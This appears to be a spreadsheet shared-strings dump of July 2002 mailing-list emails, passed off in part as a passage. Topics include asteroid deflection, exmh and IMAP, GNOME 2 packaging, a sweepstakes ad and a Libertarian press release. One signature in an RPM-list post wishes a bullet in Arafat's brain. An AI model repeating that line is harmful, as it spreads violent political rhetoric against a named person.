  <si>
    <t>SWEEPS_REMINDERS@lifetimetv.com</t>
  </si>
  <si>
    <t>Subject: There's still time to enter Lifetime's New Season Sweeps!</t>
  </si>
  <si>
    <t>LIFETIMETV.COM SWEEPSTAKES REMINDER\n\nThursday, July 25, 2002\n\n***********************************************************\nNEW SEASON OF A LIFETIME SWEEPSTAKES\n\nEnter our New Season of a Lifetime Sweepstakes for a chance to kick up your heels with the stars! On July 28, you can tune in to Lifetime's Sunday night lineup, which includes our new original series, "For the People," and all-new episodes of "Strong Medicine" and "The Division." Best of all, enter the New Season of a Lifetime Sweepstakes and you could win a trip to the set of "Strong Medicine" and a $10,000 summer shopping spree! Enter daily for more chances to win.\n\nGo to [URL]http://www.lifetimetv.com[/URL]\n\n***********************************************************\nWe don't want you to miss this fantastic sweepstakes! If you have any problems accessing the link, just copy and paste it into your browser's address box.\n\n\n***********************************************************\nSUBSCRIPTION INFO FOR THE LIFETIMETV.COM SWEEPSTAKES REMINDER\n\nPlease do not reply to this e-mail; it's automatically generated and this mailbox is not read by anyone, therefore you will not get a response. If you wish to be removed from the Sweepstakes Reminder mailing list, please send an e-mail to unsubscribe-sweeps@email.lifetimetv.com. If you are a My Lifetime member and wish to add to or modify your current newsletter preferences, please go to [URL]http://www.lifetimetv.com[/URL] and change your subscription options. If you need to write to us, please do so at subscriptions@lifetimetv.com.\nThank you.</t>
  </si>
  <si>
    <t>http://www.lifetimetv.com http://www.lifetimetv.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Dave Long &lt;dl@silcom.com&gt;\nDate: Thu, 25 Jul 2002 12:47:53 -0700</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 12:47:53 -0700</t>
  </si>
  <si>
    <t>(correction) Re: [Baseline] Raising chickens the high-tech way</t>
  </si>
  <si>
    <t>&gt; (or who are offspring of Wilt)\n\nMy bad.  Wilt, even if he had media\nexposure that major studs only dream\nabout, was just another example of\nnatural selection, and doesn't even\ncome close to livestock potency.\n\n1) I rather doubt that most of his\n20,000 women bothered to check the\nrebounding records of his cousins\nand uncles and whatnot (how old is\nbasketball, in generations?) and\ncompared them with their own kin's.\n\n2) Let's give Mr. Chamberlain the\nbenefit of the doubt and suppose he\nsired twins with each mate.  40,000\nlifetime production compares poorly\nwith a holstein bull.\n\n-Dave\n\n&gt; Teat size and placement are always ideal which suggests that INCOME\n&gt; daughters are the perfect kind for robot milkers.\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Rodent of Unusual Size &lt;Ken.Coar@Golux.Com&gt;\nFrom: Eugen Leitl &lt;eugen@leitl.org&gt;\nDate: Thu, 25 Jul 2002 12:24:25 +0200 (CEST)</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 12:24:25 +0200 (CEST)</t>
  </si>
  <si>
    <t>On Thu, 25 Jul 2002, Rodent of Unusual Size wrote:\n\n&gt; Doesn't apply to this one; you're off by three orders of magnitude.\n&gt; Only 2km diametre, this one.  Of course, that's still a lot of mass\n&gt; to hit the planet even if it *is* in the form of dust and gas.\n\nAntimissile defense is designed to operate in ~LEO environment, and knocks\nout stuff by kinetic kill or nearby nuking (damage by neutron flux\nimpacting the fissibles). It is *not* designed to apply a 100 MT warhead\n(we don't have these, and synchonous impact is even more out of question)  \ndetonate-on-impact to a 28 km/s rock or rubble target. A 100 MT warhead\nmost assuredly will scarcely fragment a 2 km target in the few seconds\nleft before the impact. This is so obvious it doesn't even to need to be\nmodeled.\n\n&gt; Even if Shrub's wrist-rocket managed to vaporise it, we'd still get\n&gt; transference to the Earth's energy balance, only to the atmosphere\n&gt; rather than the litho- or hydrosphere.\n\nThe anti-missile defense is about worse than useless in this case. The\nonly way to protect is determining orbits at high precision and deflecting\nlong-term. Decades for targets this size.\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Brian Fahrlander &lt;kilroy@kamakiriad.com&gt;\nDate: Thu, 25 Jul 2002 12:22:28 -0500</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 12:22:28 -0500</t>
  </si>
  <si>
    <t>On Thu, 25 Jul 2002 15:25:05 +0200, Matthias Saou  wrote: &gt; This is called "pseudo-packages" or "meta-packages" and Debian has been &gt; using them for ages. I think Mandrake also makes these kind of empty &gt; packages. &gt;  &gt; Anyway, their use has been discussed here a while back, and personally &gt; although I do agree that they can be useful at times, I don't really like &gt; them. For me it's more of an ugly "hack" than anything else, and I'd &gt; approve completely a system that would enable to install/remove entire &gt; categories of software... but not if achieved by building empty packages. &gt;  &gt; Also, you can trivially do "apt-get install ", but removing &gt; all that it installed is a bit less trivial, and could be implemented in a &gt; trivial and clean fashion if using some functionality meant to do this.     Yeah, well, I'm about to chuck the whole darned thing right now: the first upgrade to Gnome2 wiped out the possibility of changing preferences...exactly what got me outta Ximian before.  I understand Gnomehide has the same files, right?  I'm thinking about excorsizing the durned Ximian again... ------------------------------------------------------------------------ Brian Fahrlnder              Linux Zealot, Conservative, and Technomad Evansville, IN                    My Voyage: [URL]http://www.CounterMoon.com[/URL] ICQ  5119262 ------------------------------------------------------------------------ I don't want to hear news from Isreal until the news contains the words "Bullet", "Brain", and "Arafat". _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: announce@hq.lp.org\nFrom: Libertarian Party Announcements &lt;owner-announce@lp.org&gt;\nDate: Thu, 25 Jul 2002 12:02:37 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 12:02:37 -0400 (EDT)</t>
  </si>
  <si>
    <t>Libertarian Party Announcements &lt;owner-announce@lp.org&gt;</t>
  </si>
  <si>
    <t>announce@hq.lp.org</t>
  </si>
  <si>
    <t>LP RELEASE: Outrageous military spending</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----\n\n===============================\nNEWS FROM THE LIBERTARIAN PARTY\n2600 Virginia Avenue, NW, Suite 100\nWashington DC 20037\nWorld Wide Web: [URL]http://www.LP.org[/URL]\n===============================\nFor release: July 25, 2002\n===============================\nFor additional information:\nGeorge Getz, Press Secretary\nPhone: (202) 333-0008 Ext. 222\nE-Mail: pressreleases@hq.LP.org\n===============================\n\nThousands spent on strippers, golf memberships\nshows Pentagon spending is out of control, Libertarians say\n\nWASHINGTON, DC -- Quiz question: Which of the following items have been \ncharged to the taxpayers recently by military personnel wielding \ngovernment-issued credit cards?\n\n(a) $38,000 for lap dancing at strip clubs near military bases.\n\n(b) $3,400 for a Sumo wrestling suit and $9,800 for Halloween costumes.\n\n(c) $7,373 for closing costs on a home and $16,000 for a corporate golf \nmembership.\n\n(d) $4,600 for white beach sand and $19,000 worth of decorative "river \nrock" at a military base in the Arabian desert.\n\n(e) all of the above.\n\n"Incredibly, the answer is 'all of the above,' said Steve Dasbach, \nLibertarian Party executive director. "Thanks to the federal \ngovernment's policy of doling out credit cards with no questions asked, \nthe military has launched a raid on your wallet."\n\nThe shocking revelations are contained in a General Accounting Office \naudit released last week that uncovered $101 million in "seemingly \nunneeded expenditures" made by the Air Force and Army in 2000 and \n2001. The purchases were made possible by the federal government's lax \ncredit card policy: At least 1.4 million Defense Department employees \ncarry credit cards, and last year they used them to splurge on $6.1 \nbillion in goods and services, the audit found.\n\nIn one case, a group of 200 soldiers used their military IDs and \ngovernment-issued travel cards to get cash at adult-entertainment bars, \nthen spent the money there. The clubs charged a 10 percent fee to \nsupply the soldiers with cash -- then billed the full amount to their \ntravel cards as a restaurant charge, the GAO found.\n\n"Are these warriors really fighting terrorism while frolicking in a \nstrip club, or defending our country while wearing a Sumo wrestling \nsuit?" asked Dasbach. "Americans who support a bigger defense budget, \ntake note: The Pentagon frequently behaves like any other bloated, \nreckless government agency. It promises your money will be spent on the \nworthiest of causes, then squanders it on things you could never even \nimagine."\n\nOther spending uncovered by the audit included $45,000 for luxury \ncruises, $1,800 for executive pillows, and $24,000 for a sofa and \narmchair at a military installation in the Middle East, Dasbach noted.\n \nSome military employees actually defended the purchases, the audit \nnoted, by saying that recreational items such as golf memberships can \nbe "a useful tool for building good relations with a host country" \nsuch as Saudi Arabia or the United Arab Emirates. \n\nNot surprisingly, Dasbach said, the audit found "little evidence of \ndocumented disciplinary action" against those who misused the cards, \nso taxpayers may end up paying the tab.\n  \n"It's time to impose a little military discipline on these deadbeat \nDefense Department workers, and force them to personally reimburse \ntaxpayers for every penny of improper spending," he said.\n \n"Then cut the Pentagon's massive $379 billion budget to help guard \nagainst such wasteful spending in the future. Perhaps that's one way to \nforce the Pentagon to spend its resources defending the country, \ninstead of offending the taxpayer."\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: 2.6.2\n\niQCVAwUBPUA6FdCSe1KnQG7RAQGAKwP/Zpfw0Uq3BPLnXXmnlWQ2aFFb1FSaj+nJ\nQOMt9q4TBhiYJhIdgdd+uGxoubiPfvyIweSR1PjOdoFe8dYf2h/V4gNS9hSmkSgC\n76RZVuitNf2DbEsaY8TtcUDLDC51m/jgxiGcgPkcyJ+0Wn11RRbktkVEefSNTaBz\nM8ibVFiDPyI=\n=9fYc\n-----END PGP SIGNATURE-----\n\n\n\n-----------------------------------------------------------------------\nThe Libertarian Party                                [URL]http://www.lp.org[/URL]\n2600 Virginia Ave. NW, Suite 100                    voice: 202-333-0008\nWashington DC 20037                                   fax: 202-333-0072\n-----------------------------------------------------------------------\nFor subscription changes, please use the WWW form at: \n[URL]http://www.lp.org[/URL]</t>
  </si>
  <si>
    <t>http://www.LP.org http://www.lp.org http://www.lp.org</t>
  </si>
  <si>
    <t>To: exmh-workers@spamassassin.taint.org\nFrom: Christer Borang &lt;mort@dtek.chalmers.se&gt;\nDate: Thu, 25 Jul 2002 11:23:44 +0200</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 11:23:44 +0200</t>
  </si>
  <si>
    <t>Christer Borang &lt;mort@dtek.chalmers.se&gt;</t>
  </si>
  <si>
    <t>In message &lt;5378.1027548783@dimebox&gt;, Hal DeVore writes: &gt; &gt;&gt;&gt;&gt;&gt;&gt; On Wed, 24 Jul 2002, "Chris" == Chris Garrigues wrote: &gt; &gt;  Chris&gt; Am I the only one for whom typing control-L to the main &gt;  Chris&gt; window causes this error? &gt; &gt;Getting it here too on a copy I haven't updated from CVS since  &gt;about May sometime. It's in 2.5 as well. //Christer --  | Sys admin @ MEDIC              WWW: [URL]http://www.dtek.chalmers.se[/URL]            | | Email: mort@dtek.chalmers.se   Phone: (0)31 772 5431, (0)707 53 57 57	      | "I fought the loa and the loa won, I fought the loa and the loa won..."         -- Dave Aronsson, a.s.r. _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>http://www.dtek.chalmers.se https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Thu, 25 Jul 2002 11:07:00 +0200</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 11:07:00 +0200</t>
  </si>
  <si>
    <t>Sylpheed with GNOME 2 (was Re: Ximian apt repos?)</t>
  </si>
  <si>
    <t>Once upon a time, Lance wrote : &gt; Well, from the looks of things, I can import all my mail settings from &gt; Evolution to Sylpheed.  Has anyone successfully run Sylpheed in Gnome &gt; 2.0?  I noticed with 'apt-get install gnome-session' from the 'rpm &gt; [URL]http://apt.sunnmore.net[/URL] gnome2 73' repository, Sylpheed isn't one of the &gt; packages selected for deletion. I think that's simply because Sylpheed isn't a GNOME application, but a "simple" gtk+ one. It needs no GNOME libs at all, so upgrading to GNOME 2 but keeping gtk+ 1.2 will let you keep Sylpheed with no problem. Matthias PS : Expect 0.8.1 on freshrpms.net in a few minutes ;-) --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://apt.sunnmore.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nFrom: Eugen Leitl &lt;eugen@leitl.org&gt;\nDate: Thu, 25 Jul 2002 11:02:29 +0200 (CEST)</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 11:02:29 +0200 (CEST)</t>
  </si>
  <si>
    <t>Re: Buy? (was Re: It's back? Triple-digit Dow gains at 2PM...)</t>
  </si>
  <si>
    <t>On Thu, 25 Jul 2002, R. A. Hettinga wrote:\n\n&gt; So, in light of the erstwhile bloodbath on Capital Hill, and the real\n&gt; one we just saw a few days ago in the market, it may be time for\n&gt; people to remember what Mr. Rothschild said, and buy now while\n&gt; there's blood in the streets.\n\nLuckily, I'm in no such predilection as technolumpen.\n\nHowever, the signs do seem to head for a much deeper crapper than the one\nwe're currently in, and this has relevance to those switching jobs, or\nthose just entering the job market. Nano/bio startups are all screwed up,\nalas. It's too early to wait for the radioactive glass to cool down while\nthe nukes are still going off, imo.\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;social@linux.ie&gt;\nFrom: "Ulysees" &lt;Ulysees@ulysees.com&gt;\nDate: Thu, 25 Jul 2002 10:59:36 +0100</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 10:59:36 +0100</t>
  </si>
  <si>
    <t>"Ulysees" &lt;Ulysees@ulysees.com&gt;</t>
  </si>
  <si>
    <t>&lt;social@linux.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG-Social] In case anyone forgot</t>
  </si>
  <si>
    <t>[URL]http://www.sysadminday.com[/URL]\n\n\n-- \nIrish Linux Users' Group Social Events: social@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.sysadminday.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: FoRK &lt;fork@spamassassin.taint.org&gt;\nFrom: "Gregory Alan Bolcer" &lt;gbolcer@endeavors.com&gt;\nDate: Thu, 25 Jul 2002 10:56:39 -0700</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 10:56:39 -0700</t>
  </si>
  <si>
    <t>Covalent.NET</t>
  </si>
  <si>
    <t>[1] Covalent works with Microsoft to provide ASP.NET capabilities for\nApache 2.0.  ASP.NET actually has some really elegant tools for doing\nload testing and analysis. Perhaps Microsoft's desire to embrace, extend, and\nextinguish comes from a scathing Gartner report recommending not to deploy\nIIS for enterprise applications at all.   Now users get the best of both\nworlds: all the development tools of ASP.Net and the security and reliability\nof Apache.\n\nGreg\n\n-- \nGregory Alan Bolcer, CTO   | work: +1.949.833.2800 | gbolcer at endeavors.com\nEndeavors Technology, Inc. | cell: +1.714.928.5476 | [URL]http://endeavors.com[/URL]\n\n\n[1][URL]http://www.infoworld.com[/URL]\n\n&gt; With help from Microsoft in Redmond, Wash., Covalent said it was able to develop a \n\n&gt; module for its Enterprise Ready Server that would allow ASP.Net applications to run on \n\n&gt; Apache 2.0. However, organizations that use the freely available Web server won't be able \n\n&gt; to run ASP.Net applications unless they purchase Covalent's software. Zemlin said that the \n\n&gt; company doesn't plan to release an open-source version of its .Net module.\n\n\n\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://endeavors.com http://www.infoworld.com http://xent.com</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Thu, 25 Jul 2002 10:40:28 -0500</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 10:40:28 -0500</t>
  </si>
  <si>
    <t>Re: Imap servers that support the MH folder/file standards</t>
  </si>
  <si>
    <t>--==_Exmh_-178228168P Content-Type: text/plain; charset=us-ascii &gt; From:  Stephen Hocking  &gt; Date:  Thu, 25 Jul 2002 09:49:46 -0500 &gt; &gt; As far as I understand, exmh also does some direct file access to do &gt; things, so the daemon would also have to be able to duplicate this, &gt; and the relevant bits inside exmh would have to be tweaked. It does.  If anybody in the nmh world actually gets to the point of actually  implementing imap access, this will need to change, but until there exists an  environment where the direct access doesn't work, we're not going to take the  performance hit. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-178228168P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9QBvsK9b4h5R0IUIRAjvCAKCPgWXNzEZeGqZzndi4c/eCvYFwjACfXyIf unh9xzeNTBgaVtCoOJ4MErU= =DXeG -----END PGP SIGNATURE----- --==_Exmh_-178228168P-- _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: pll@lanminds.com\nDate: Thu, 25 Jul 2002 10:27:11 -0400</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 10:27:11 -0400</t>
  </si>
  <si>
    <t>pll@lanminds.com</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; On Thu, 25 Jul 2002, "Stephen" == Stephen Hocking wrote:\n\n  Stephen&gt; What I'd like to do is use an imap capable mailer to\n  Stephen&gt; communicate with an imap server that is serving up my MH\n  Stephen&gt; folders. Does anyone know of any Imap servers that can do\n  Stephen&gt; this?\n\nThis topic comes up every so often on this list.  The short answer is \nno, there really isn't an IMAP server which knows how to do this.\n\nThe longer answer is, UW-IMAP claims it does, but doesn't do a good \njob, and doesn't update scan caches, unseen, etc.\n\nYou may have better luck while on the road using raw mh commands to \nread you e-mail if you have ssh access to your internal environment.\nI've been doing this for quite a long time, and, after the learning \ncurve of the mh command set (which I still don't know completely),\nI'm quite able to access my e-mail and respond to those e-mails which \nrequire a response.\n\nAnother option is using mutt as your mail client when you're remotely \naccessing e-mail.  Mutt does a decent job of dealing with mh folders, \nthough it doesn't update scan caches or unseen files either.  But it \nis a decent interface alternative to raw mh, and it's quite \ncustomizable.\n\nThe real answer to your question is that we need not an IMAP server \nthat understands mh folders, but an mh server to which a local client \ncould connect to.  In theory, it shouldn't be too hard (technically) \nto cobble this together with ssh.  Replace all of exmh's calls to mh \ncommands with a wrapper which uses ssh to lob these commands over to \na remote system, and dump the output back into the local exmh client.\n\n-- \n\nSeeya,\nPaul\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;,\nFrom: "Fox" &lt;lds0062@cdc.net&gt;\nDate: Thu, 25 Jul 2002 10:08:13 -0400</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 10:08:13 -0400</t>
  </si>
  <si>
    <t>&lt;razor-users@example.sourceforge.net&gt;,</t>
  </si>
  <si>
    <t>ignore ----- Original Message ----- From: "Christopher VanOosterhout"  To:  Sent: Thursday, July 25, 2002 7:51 AM Subject: [Razor-users] unsubscribe &gt; unsubscribe &gt; &gt; At 09:13 PM 7/24/02 -0800, John Andersen wrote: &gt; &gt;On Wednesday 24 July 2002 08:42 am, rODbegbie wrote: &gt; &gt; &gt; rODbegbie wrote: &gt; &gt; &gt; &gt; I get the impression that Vipul &amp; co are deliberately trying to &gt; &gt; &gt; &gt; mislead users into downloading the dev code in order to get more &gt; &gt; &gt; &gt; unwitting test sites. &gt; &gt; &gt; &gt; &gt; &gt; Apologies to all.  In re-reading, that sentence sounds a lot harsher than I &gt; &gt; &gt; intended. &gt; &gt; &gt; &gt; &gt; &gt; As the old maxim goes, "Never ascribe to malice that which can be equally &gt; &gt; &gt; explained by incompetence". &gt; &gt; &gt; &gt;Oh Yeah that sounds a WHOLE lot better... (chuckle). &gt; &gt; &gt; &gt;-- &gt; &gt;_________________________________________________ &gt; &gt;No I Don't Yahoo! &gt; &gt;And I'm getting pretty sick of being asked if I do. &gt; &gt;_________________________________________________ &gt; &gt;John Andersen / Juneau Alaska &gt; &gt; &gt; &gt; &gt; &gt;------------------------------------------------------- &gt; &gt;This sf.net email is sponsored by: Jabber - The world's fastest growing &gt; &gt;real-time communications platform! Don't just IM. Build it in! &gt; &gt;[URL]http://www.jabber.com[/URL] &gt; &gt;_______________________________________________ &gt; &gt;Razor-users mailing list &gt; &gt;Razor-users@lists.sourceforge.net &gt; &gt;[URL]https://lists.sourceforge.net[/URL] &gt; &gt; -- &gt; Christopher VanOosterhout &gt; Torresen Marine, Inc. &gt; Internet Division &gt; [URL]http://www.torresen.com[/URL] &gt; [URL]http://www.marinedieseldirect.com[/URL] &gt; 3126 Lake Shore Drive &gt; Muskegon, Michigan 49441 &gt; 231-759-8596 &gt; &gt; &gt; &gt; ------------------------------------------------------- &gt; This sf.net email is sponsored by: Jabber - The world's fastest growing &gt; real-time communications platform! Don't just IM. Build it in! &gt; [URL]http://www.jabber.com[/URL] &gt; _______________________________________________ &gt; Razor-users mailing list &gt; Razor-users@lists.sourceforge.net &gt; [URL]https://lists.sourceforge.net[/URL] ------------------------------------------------------- This sf.net email is sponsored by: Jabber - The world's fastest growing  real-time communications platform! Don't just IM. Build it in!  [URL]http://www.jabber.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.jabber.com https://lists.sourceforge.net http://www.torresen.com http://www.marinedieseldirect.com http://www.jabber.com https://lists.sourceforge.net http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: Brent Welch &lt;welch@panasas.com&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Thu, 25 Jul 2002 09:17:01 -0500</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 09:17:01 -0500</t>
  </si>
  <si>
    <t>Re: folders moving around in the unseen window</t>
  </si>
  <si>
    <t>--==_Exmh_-1233982810P Content-Type: text/plain; charset=us-ascii &gt; From:  Brent Welch  &gt; Date:  Thu, 18 Jul 2002 08:13:53 -0700 &gt; &gt; Unfortunately, an unattributed patch may or may not be a contributed patch &gt; as I'm not always good about recording the source of a patch.  I suspect &gt; this patch may have been contributed from someone that uses the &gt; auto-pack or auto-sort features, which I don't use.  This change should be &gt; tested against those features. I'm running with autosort right now.  If I don't see any problems, I' run with  autopack for a while. I did find some stuff that was being called too many times when auto-sort was enabled, but otherwise it seems to be working. My computer is a lot faster than the last time I tried autosort (back in the  mid-90s); this is actually acceptable. Once I've confirmed that nothing actually breaks, I think I'll look into a few  more places that autosort needs to be called, because right now it only sorts  when you change to a folder, but if a new message arrives in the folder you're  looking at, it doesn't get sorted. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-1233982810P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9QAhdK9b4h5R0IUIRArP5AJ9VlUsxOjQhik1UZuFl1Yyta0XMFgCgiZw4 VdvKT009spZK/h2q6HJTqX8= =+Ns2 -----END PGP SIGNATURE----- --==_Exmh_-1233982810P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Stephen Hocking &lt;shocking@houston.rr.com&gt;\nDate: Thu, 25 Jul 2002 09:06:42 -0500</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 09:06:42 -0500</t>
  </si>
  <si>
    <t>Stephen Hocking &lt;shocking@houston.rr.com&gt;</t>
  </si>
  <si>
    <t>Imap servers that support the MH folder/file standards</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;From time to time I have to travel, and seem to end up with a rather slow\nlink back home that makes remote display of exmh rather slow, even over\nssh and/or VNC. What I'd  like to do is use an imap capable mailer to\ncommunicate with an imap server that is serving up my MH folders. Does\nanyone know of any Imap servers that can do this? I'd like it to be able\nto handle the  mailstore using MH commands so things don't get out of\nsync. At the moment I use a combo of fetchmail and procmail to handle\nsoring things when I'm local, and it's possible that an imap server\nwould mung this when I deleted a message remotely.\n\n\n\n	Stephen\n\n-- \n  The views expressed above are not those of PGS Tensor.\n\n    "We've heard that a million monkeys at a million keyboards could produce\n     the Complete Works of Shakespeare; now, thanks to the Internet, we know\n     this is not true."            Robert Wilensky, University of California\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;bitbitch@magnesium.net&gt;\nFrom: Eugen Leitl &lt;eugen@leitl.org&gt;\nDate: Thu, 25 Jul 2002 08:26:38 +0200 (CEST)</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 08:26:38 +0200 (CEST)</t>
  </si>
  <si>
    <t>On Wed, 24 Jul 2002 bitbitch@magnesium.net wrote:\n\n&gt; Hey, meybee by then, Bush's grand plan for a missle defense system will\n&gt; actually pan out and -work- ...\n\nHey, that thing is 2 km across and 28 km/s fast. There's nothing you can\ndo just before the impact with a system that was designed to deal with\ntiny ballistic missiles, and largely by damaging them, not destroying\nthem. Apart from twiddling with the surface albedo which might be not\nenough -- we currently don't have ion drives with enough power, or at\nleast we can't develop and deploy them on time, so that only leaves you\nwith nukes. Assymetrical repeated flash-evaporation (anything closer would\nrisk fragmenting it) on rocks of unknown composition (could be a pile of\nrubble for all what we know) has never been tried yet, though.\n\n&gt; I'm not holding my breath, but i'm not going to panic for something thats\n&gt; a little under 17 years away, either.\n\nIt is much more interesting whether you can kill enough of delta v for a \ncapture. But here trying to brake a smaller object (say, few 100 m across) \nwith final stage aerobraking would be far more useful. Otoh, one could as \nwell could invest that effort into a launch capacity on the Moon.\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Flatware or Road Kill? &lt;FoRK@xent.com&gt;\nFrom: Rodent of Unusual Size &lt;Ken.Coar@Golux.Com&gt;\nDate: Thu, 25 Jul 2002 06:11:23 -0400</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 06:11:23 -0400</t>
  </si>
  <si>
    <t>James Rogers wrote:\n&gt; \n&gt; I don't think a ballistic missile defense system will be much help\n&gt; against a rock a couple thousand kilometers in diameter.\n\nDoesn't apply to this one; you're off by three orders of magnitude.\nOnly 2km diametre, this one.  Of course, that's still a lot of mass\nto hit the planet even if it *is* in the form of dust and gas.\nEven if Shrub's wrist-rocket managed to vaporise it, we'd still get\ntransference to the Earth's energy balance, only to the atmosphere\nrather than the litho- or hydrosphere.\n-- \n#ken	P-)}\n\nKen Coar, Sanagendamgagwedweinini  [URL]http://Golux.Com[/URL]\nAuthor, developer, opinionist      [URL]http://Apache-Server.Com[/URL]\n\n"Millennium hand and shrimp!"\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: kragen@pobox.com (Kragen Sitaker)\nDate: Thu, 25 Jul 2002 04:56:39 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 04:56:39 -0400 (EDT)</t>
  </si>
  <si>
    <t>Eugen Leitl writes: &gt; Apart from twiddling with the surface albedo which might be not &gt; enough -- we currently don't have ion drives with enough power, or at &gt; least we can't develop and deploy them on time,  My estimate is that, in the worst case, we have 17 years (5.4e8 seconds) to move it one earth radius, or about 6000 km (6e6 m).   a t^2/2 = x, if I remember right, so a = 2x/t^2, which is  1.2e7 m/(2.9e17 s^2), or about 4.1e-11 m/s^2, which is not a very large acceleration, roughly equivalent to the gravitational acceleration in these parts divided by 200000000000.  Assuming a 2km-wide --- that is, 20 000 decimeter-wide --- spherical asteroid of specific gravity 10, 4/3 pi r^3 says it would have a volume of 4e12 cubic decimeters and thus a mass of 4e13 kg.  The force we'd have to apply to achieve this acceleration would be roughly equivalent to the weight of 200 kg here on Earth. So, yeah, ion drives are probably a no-go, unless I screwed up the calculations here; I think the force they typically exert is about four orders of magnitude too small. If we just wanted to hit today it with enough of an impulse that it would miss us 17 years later, we'd need to accelerate it by about 1.1 cm/s.  A one-ton (1000kg) mass would need to hit it at about 4e9 m/s, or about ten times the speed of light, to achieve this, so that's not possible.  (If you could actually put enough work into a one-ton mass, as it approached the speed of light, it would mass more, so you could still do it with a one-ton mass; but we don't have anything approaching that speed.)  The impulse required is inversely proportional to the remaining time to impact, so if we were to hit it after half the time has elapsed, we'd need to accelerate it by around 2.2 cm/s instead. The gravitational force of an Earth-sized mass could provide sufficient deflection if that mass were about 4.5e5 times as far away from the asteroid as we are from Earth's center, or about 2.7e9 m, or about 0.018 times the distance from the Earth to the Sun (0.018 AU). (And if that mass stayed so nearby for 17 years.) The effects of continuous acceleration benefit greatly from planning ahead, since they scale with t^2, not t --- and thus the needed acceleration scales with 1/t^2.  After half the time has elapsed, we'd need four times as much acceleration to make it miss the Earth than if we were to start accelerating it now. All of these numbers are a little low, because the Earth presents a slightly easier target than its physical size suggests, due to its gravity well.  How much easier depends on the speed of the projectile in ways I don't understand. They're also a little high, because they assume the force is being applied purely at right angles to the asteroid's current path, which is a slightly suboptimal scenario (although for velocity changes five orders of magnitude 